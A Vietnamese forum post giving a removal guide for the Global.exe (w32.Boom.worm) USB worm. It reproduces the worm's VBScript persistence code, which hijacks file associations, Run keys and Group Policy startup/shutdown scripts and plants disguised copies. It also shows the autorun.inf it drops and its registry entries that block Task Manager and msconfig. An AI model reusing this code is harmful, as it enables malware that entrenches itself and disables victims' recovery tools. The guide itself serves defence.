Diệt virus Global.exe (w32.Boom.worm)
Tạo các process :
Mã:
|
C:\WINDOWS\system32\dllcache\Recycler.{645FF040-5081-101B-9F08-00AA002F954E}\svchost.exe
Path thật : C:\WINDOWS\system32\dllcache\svchost.exe
C:\WINDOWS\system32\dllcache\Recycler.{645FF040-5081-101B-9F08-00AA002F954E}\system.exe
Path thật : C:\WINDOWS\system32\dllcache\system.exe
C:\WINDOWS\system32\dllcache\Recycler.{645FF040-5081-101B-9F08-00AA002F954E}\Global.exe |
Path thật : C:\WINDOWS\system32\dllcache\Global.exe
Các process này cùng chạy và bảo vệ lẫn nhau (Khi bạn Kill 1 process thì các process còn lại sẽ gọi lại process vừa bị Kill)
Thay đổi các giá trị sau trong Registry :
Các giá trị lưu trữ vào
C:\WINDOWS\Cursors\Boom.vbs và được thực thi :
dim fs,rg
Mã:
|
set fs = createobject("scripting.filesystemobject")
set rg = createobject("wscript.shell")
on error resume next
rg.regwrite "HKCR\.vbs\", "VBSFile"
rg.regwrite "HKCU\Control Panel\Desktop\SCRNSAVE.EXE", " C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com"
rg.regwrite "HKCU\Control Panel\Desktop\ScreenSaveTimeOut", "30"
rg.regwrite "HKCR\MSCFile\Shell\Open\Command\", "C:\WINDOWS\pchealth\Global.exe"
rg.regwrite "HKCR\regfile\Shell\Open\Command\", "C:\WINDOWS\pchealth\Global.exe"
rg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru nOnce\", "C:\WINDOWS\system32\dllcache\Default.exe"
rg.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru nOnce\", "C:\WINDOWS\system32\dllcache\Default.exe"
rg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\", "C:\WINDOWS\system\KEYBOARD.exe"
rg.regwrite "HKEY_CLASSES_ROOT\MSCFile\Shell\Open\Command\ ", "C:\WINDOWS\Fonts\Fonts.exe"
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\S cripts\Logoff\0\DisplayName","Local Group Policy"
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\S cripts\Logoff\0\FileSysPath",""
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\S cripts\Logoff\0\GPO-ID","LocalGPO"
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\S cripts\Logoff\0\GPOName","Local Group Policy"
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\S cripts\Logoff\0\SOM-ID","Local"
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\S cripts\Logoff\0\0\Parameters",""
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\S cripts\Logoff\0\0\Script","C:\WINDOWS\Cursors\Boom .vbs"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\S cripts\Shutdown\0\DisplayName", "Local Group Policy"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\S cripts\Shutdown\0\FileSysPath", ""
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\S cripts\Shutdown\0\GPO-ID", "LocalGPO"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\S cripts\Shutdown\0\GPOName", "Local Group Policy"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\S cripts\Shutdown\0\SOM-ID", "Local"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\S cripts\Shutdown\0\0\Parameters", ""
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\S cripts\Shutdown\0\0\Script", "C:\WINDOWS\Cursors\Boom.vbs"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\S cripts\Startup\0\DisplayName", "Local Group Policy"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\S cripts\Startup\0\FileSysPath", ""
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\S cripts\Startup\0\GPO-ID", "LocalGPO"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\S cripts\Startup\0\GPOName", "Local Group Policy"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\S cripts\Startup\0\SOM-ID", "Local"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\S cripts\Startup\0\0\Parameters", ""
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\S cripts\Startup\0\0\Script", "C:\WINDOWS\Cursors\Boom.vbs"
If Not fs.fileexists("C:\WINDOWS\Fonts\Fonts.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\Fonts\Fonts.exe")
If Not fs.fileexists("C:\WINDOWS\pchealth\helpctr\binarie s\HelpHost.com") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.co m")
If Not fs.fileexists("C:\WINDOWS\pchealth\Global.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\pchealth\Global.exe")
If Not fs.fileexists("C:\WINDOWS\system\KEYBOARD.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\system\KEYBOARD.exe")
If Not fs.fileexists("C:\WINDOWS\system32\dllcache\Defaul t.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\system32\dllcache\Default.exe")
If Not fs.fileexists("C:\windows\system32\drivers\drivers .cab.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\windows\system32\drivers\drivers.cab.exe ")
If Not fs.fileexists("C:\windows\media\rndll32.pif ") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\windows\media\rndll32.pif")
If Not fs.fileexists("C:\windows\fonts\tskmgr.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\windows\fonts\tskmgr.exe") |
Được ghi bởi file thực thi :
Để kích hoạt virus:
Mã:
|
HKCU\Control Panel\Desktop\SCRNSAVE.EXE
HKCR\MSCFile\Shell\Open\Command\
HKCR\regfile\Shell\Open\Command\
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ctfmon.exe\Debugger
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\boot.exe\Debugger
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorun.exe\Debugger
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe\Debugger
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\auto.exe\Debugger
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe\Debugger
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Once\
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Once\
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run \
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\pol icies\Explorer\Run\sys |
Để thay đổi các thuộc tính khác:
Mã:
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer\Advanced\ShowSuperHidden
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Explorer\Advanced\Folder\SuperHidden\Va lueName
HKLM\Software\Microsoft\Windows\CurrentVersion\Pol icies\System\DisableStatusMessages
HKCU\Software\Policies\Microsoft\Windows\System\Sc ripts\Logoff\0\DisplayName
HKCU\Software\Policies\Microsoft\Windows\System\Sc ripts\Logoff\0\FileSysPath
HKCU\Software\Policies\Microsoft\Windows\System\Sc ripts\Logoff\0\GPO-ID
HKCU\Software\Policies\Microsoft\Windows\System\Sc ripts\Logoff\0\GPOName
HKCU\Software\Policies\Microsoft\Windows\System\Sc ripts\Logoff\0\SOM-ID
HKCU\Software\Policies\Microsoft\Windows\System\Sc ripts\Logoff\0\0\Parameters
HKCU\Software\Policies\Microsoft\Windows\System\Sc ripts\Logoff\0\0\Script
HKLM\Software\Policies\Microsoft\Windows\System\Sc ripts\Shutdown\0\DisplayName
HKLM\Software\Policies\Microsoft\Windows\System\Sc ripts\Shutdown\0\FileSysPath
HKLM\Software\Policies\Microsoft\Windows\System\Sc ripts\Shutdown\0\GPO-ID
HKLM\Software\Policies\Microsoft\Windows\System\Sc ripts\Shutdown\0\GPOName
HKLM\Software\Policies\Microsoft\Windows\System\Sc ripts\Shutdown\0\SOM-ID
HKLM\Software\Policies\Microsoft\Windows\System\Sc ripts\Shutdown\0\0\Parameters
HKLM\Software\Policies\Microsoft\Windows\System\Sc ripts\Shutdown\0\0\Script
HKLM\Software\Policies\Microsoft\Windows\System\Sc ripts\Startup\0\DisplayName
HKLM\Software\Policies\Microsoft\Windows\System\Sc ripts\Startup\0\FileSysPath
HKLM\Software\Policies\Microsoft\Windows\System\Sc ripts\Startup\0\GPO-ID
HKLM\Software\Policies\Microsoft\Windows\System\Sc ripts\Startup\0\GPOName
HKLM\Software\Policies\Microsoft\Windows\System\Sc ripts\Startup\0\SOM-ID
HKLM\Software\Policies\Microsoft\Windows\System\Sc ripts\Startup\0\0\Parameters
HKLM\Software\Policies\Microsoft\Windows\System\Sc ripts\Startup\0\0\Script |
Ngoài ra còn khá nhiều địa chỉ khác trong virus nhưng ko hiẻu sao DC không thấy các địa chỉ này bị thay đổi khi bị nhiễm virus.
Tạo tập tin
Autoruns.inf với nội dung như sau trong mỗi ổ đĩa (Đĩa cứng và USB) :
Mã:
|
[autorun]
Open=MS-DOS.com
Shellexecute=MS-DOS.com
Shell\Open\command=MS-DOS.com
Shell\Explore\command=MS-DOS.com |
Đường dẫn các tập tin là nhân bản của virus :
[CODE]
C:\WINDOWS\system32\dllcache\svchost.exe
C:\WINDOWS\system32\dllcache\Global.exe
C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com
C:\WINDOWS\system32\dllcache\system.exe
C:\WINDOWS\Fonts\Fonts.exe
C:\WINDOWS\system32\drivers\drivers.cab.exe
C:\WINDOWS\system32\dllcache\Global.exe
C:\WINDOWS\system32\dllcache\svchost.exe
C:\WINDOWS\system\KEYBOARD.exe
C:\WINDOWS\system32\dllcache\Default.exe
C:\WINDOWS\system32\regedit.exe
C:\WINDOWS\Fonts\tskmgr.exe
C:\WINDOWS\Media\rndll32.pif
C:\WINDOWS\Cursors\Boom.vbs
Hoạt động :
- Thiết lập chế độ ẩn (Hidden) cho tất cả thư mục trên đĩa USB và tự Copy mình và với tên thư mục tại đường dẫn tương ứng.
- Khởi động mỗi khi khởi động máy.
- Khởi động mỗi khi mở mỗi đĩa cứng trên máy hay USB bằng cách đúp chuột.
- Chặn sự làm việc của các chương trình tên :
Mã:
|
ctfmon.exe
taskmgr.exe
boot.exe
autorun.exe
autoruns.exe
auto.exe
msconfig.exe
procexp.exe |
Thay vào đó là sự khởi động của virus tại các Path khác nhau.
- Sử dụng 2 hàm
API sndPlaySound và
mciSendString tại thư viện
winmm.dll để play file
C:\WINDOWS\Fonts\wav.wav- 3 process cùng hoạt động nên rất khó Kill nếu dùng cách thông thường.
Còn tiếp ....
Tiêu diệt :
1. Đổi tên ProcessXP cho khác tên procexp.exe như mặc định tải từ trang chủ của nó.
- Đổi tên Autoruns.exe tương tự như đã nói với ProcessXP.
- Có thể thay thế ProcessXP bằng các Soft quản lý tiên trình hệ thống bất kỳ cho phép Suspend hay tốt nhất là có khả năng Kill nhiều tiến trình cùng lúc (Như IceSword hay Process Viewer).
1. Khởi động ProcessXP.- Suspend lần lượt cả 3 tiến trình đã nói ở phần trên. Sau đó Kill chúng.
- Khởi động Autoruns với tên file mới (Ko để giống các tên file đã liệt kê ở phân Hoạt động là được rồi).
Bỏ dấu chọn (Hoặc xóa luôn) các giá trị bị DC vẽ ở đây :
2. Dùng Total Commander hay bất kỳ phần mềm nào cho phép xem các file, thư mục thiết lập chế độ ẩn (Vấn đề thiết lập làm sao để có thể xem các file ẩn, bạn có thể xem các tài liệu trươc của DC) và xóa các file sau :
Mã:
|
C:\WINDOWS\system32\dllcache\svchost.exe
C:\WINDOWS\system32\dllcache\Global.exe
C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com
C:\WINDOWS\system32\dllcache\system.exe
C:\WINDOWS\Fonts\Fonts.exe
C:\WINDOWS\system32\drivers\drivers.cab.exe
C:\WINDOWS\system32\dllcache\Global.exe
C:\WINDOWS\system32\dllcache\svchost.exe
C:\WINDOWS\system\KEYBOARD.exe
C:\WINDOWS\system32\dllcache\Default.exe
C:\WINDOWS\system32\regedit.exe
C:\WINDOWS\Fonts\tskmgr.exe
C:\WINDOWS\Media\rndll32.pif
C:\WINDOWS\Cursors\Boom.vbs |
Tại mỗi ổ đĩa trên máy bạn, bạn tìm và xóa 2 file :
Mã:
|
autoruns.inf
MS-DOS.com |
3. Khởi động Registry
(Không được truy cập bằng cách Start-> Run... -> Nhập regedit rồi Enter, virus sẽ hoạt động lại nếu bạn chưa xóa các file đã liệt kê).
Bạn làm như sau : Start-> Run... -> Nhập c:\windows\regedit.exe rồi Enter
Sở dĩ bạn phải làm như vậy vì lúc này path : C:\WINDOWS\system32\regedit.exe là virus, nếu bạn làm theo thao tac thông thường chính là gọi lài virus.
Còn tại Path c:\windows\regedit.exe vẫn là Registry thật.
Vào key
Mã:
|
HKEY_CLASSES_ROOT\MSCFile\Shell\Open\Command -> Gía trị hiện nay là C:\WINDOWS\Fonts\Fonts.exeHãy sửa lại giá trị này thành : %SystemRoot%\System32\mmc.exe "%1" %* |
Vào key
Mã:
|
HKCR\regfile\Shell\Open\Command\ -> Gía trị hiện nay là C:\WINDOWS\system32\dllcache\Global.exe |
Hãy sửa lại giá trị này thành :
regedit.exe "%1"
Để phục hồi các thư mục bị ẩn trong USB bạn có thể xem bài viết diệt virus Lotovn
Chú ý :
Cũng như khi tiêu diệt virus Kavo, bạn không được truy xuất dữ liệu trên máy tính bằng cach nháy đúp vào chúng mà bạn nên nhập giá trị ổ đĩa muôn truy xuất vào thanh Address rồi Enter để truy xuất.
Hoặc trong suốt quá trình làm việc nên dùng phần mềm thay thế Windows Explorer như Total Commander hay Norton Commander...
--------------------------
Theo: Taskkill (vnbb)